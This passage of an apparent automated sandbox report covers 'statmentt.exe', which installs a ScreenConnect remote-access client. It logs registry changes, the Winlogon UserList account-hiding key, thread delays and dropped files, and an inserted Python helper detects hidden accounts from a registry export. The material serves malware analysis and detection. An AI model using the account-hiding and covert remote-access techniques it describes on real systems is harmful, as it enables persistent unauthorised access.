                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (de5851ad6e374ce3)

                              Hooking and other Techniques for Hiding and Protection

                              Source: statmentt.exe, 00000000.00000002.1800368521.0000000005910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000004.00000003.1797154534.0000000004388000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888442965.0000000001550000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888844830.00000000015D2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1899115632.000000001C062000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: statmentt.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.Windows.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.4.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
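The entries above record only that the UserList key path occurs as a string in statmentt.exe and in the dropped ScreenConnect binaries (ScreenConnect.Windows.dll ships with it, so the string alone does not distinguish this installer from a stock client). Whether an account was actually hidden is decided by the values under that key on the host: a REG_DWORD named after the account and set to 0 removes that account from the logon screen, any other value leaves it visible. The Python below is an added triage helper, not code from the report or from ScreenConnect: it parses a `reg export` of that key collected from a host and lists the hidden accounts, accepting both the `dword:` form reg.exe writes and the `hex(4):` form found in hand-written .reg files. The export text embedded in it is constructed sample data with invented account names.

```python
import re

# Added example, not part of the Joe Sandbox report. Parses a `reg export`
# of the Winlogon SpecialAccounts\UserList key and reports accounts hidden
# from the logon screen (REG_DWORD value 0).

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")

_KEY_RE = re.compile(r"^\[(.+)\]\s*$")
# "name"=value ; the name may contain escaped quotes or backslashes
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.+?)\s*$')


def _parse_dword(raw: str):
    """Decode a REG_DWORD written either as dword:0000000a or as the
    little-endian byte list hex(4):0a,00,00,00. Other types return None."""
    raw = raw.strip()
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if raw.lower().startswith("hex(4):"):
        octets = [int(b, 16) for b in raw[7:].split(",") if b]
        return int.from_bytes(bytes(octets), "little")
    return None


def parse_userlist(reg_text: str) -> dict[str, int]:
    """Return {account_name: dword_value} for DWORD values directly under the
    UserList key; values under other keys in the same export are ignored.
    reg export writes UTF-16LE with a BOM, so decode the file before calling."""
    values: dict[str, int] = {}
    in_key = False
    for line in reg_text.splitlines():
        key = _KEY_RE.match(line)
        if key:
            in_key = key.group(1).lower() == USERLIST_KEY.lower()
            continue
        if not in_key:
            continue
        m = _VALUE_RE.match(line)
        if not m:
            continue
        name = m.group(1).replace('\\"', '"').replace("\\\\", "\\")
        val = _parse_dword(m.group(2))
        if val is not None:
            values[name] = val
    return values


def hidden_accounts(reg_text: str) -> list[str]:
    """Accounts whose UserList DWORD is 0, i.e. hidden from the logon UI."""
    return sorted(name for name, val in parse_userlist(reg_text).items() if val == 0)


# Constructed sample export (not taken from the analysed host): one visible
# account, two hidden ones (one written in hex(4) form), plus an unrelated
# key that must not be picked up.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList]
"Administrator"=dword:00000001
"svc_remote"=dword:00000000
"helpdesk$"=hex(4):00,00,00,00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts]
"Unrelated"=dword:00000000
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        text = open(sys.argv[1], encoding="utf-16").read()  # reg export output
    else:
        text = SAMPLE_EXPORT
    for account in hidden_accounts(text):
        print(f"hidden from logon screen: {account}")
```

Point it at `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" userlist.reg` output from the host; an empty result with the key present, or a missing key, means no account was hidden this way, and a hidden name that does not correspond to a known support or service account is what turns this signature from expected remote-access-tool behaviour into a finding worth escalating.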
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 17F0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 3250000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 1830000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 6960000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 60F0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 7960000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 8960000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 8BE0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Memory allocated: 9BE0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Memory allocated: 1860000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Memory allocated: 1A90000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Memory allocated: 660000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Memory allocated: 1A440000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Memory allocated: 1400000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Memory allocated: 1B270000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statmentt.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.InstallerActions.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSIF488.tmp
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
                              Source: C:\Windows\SysWOW64\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSIF739.tmp
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
                              Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.Cab.dll
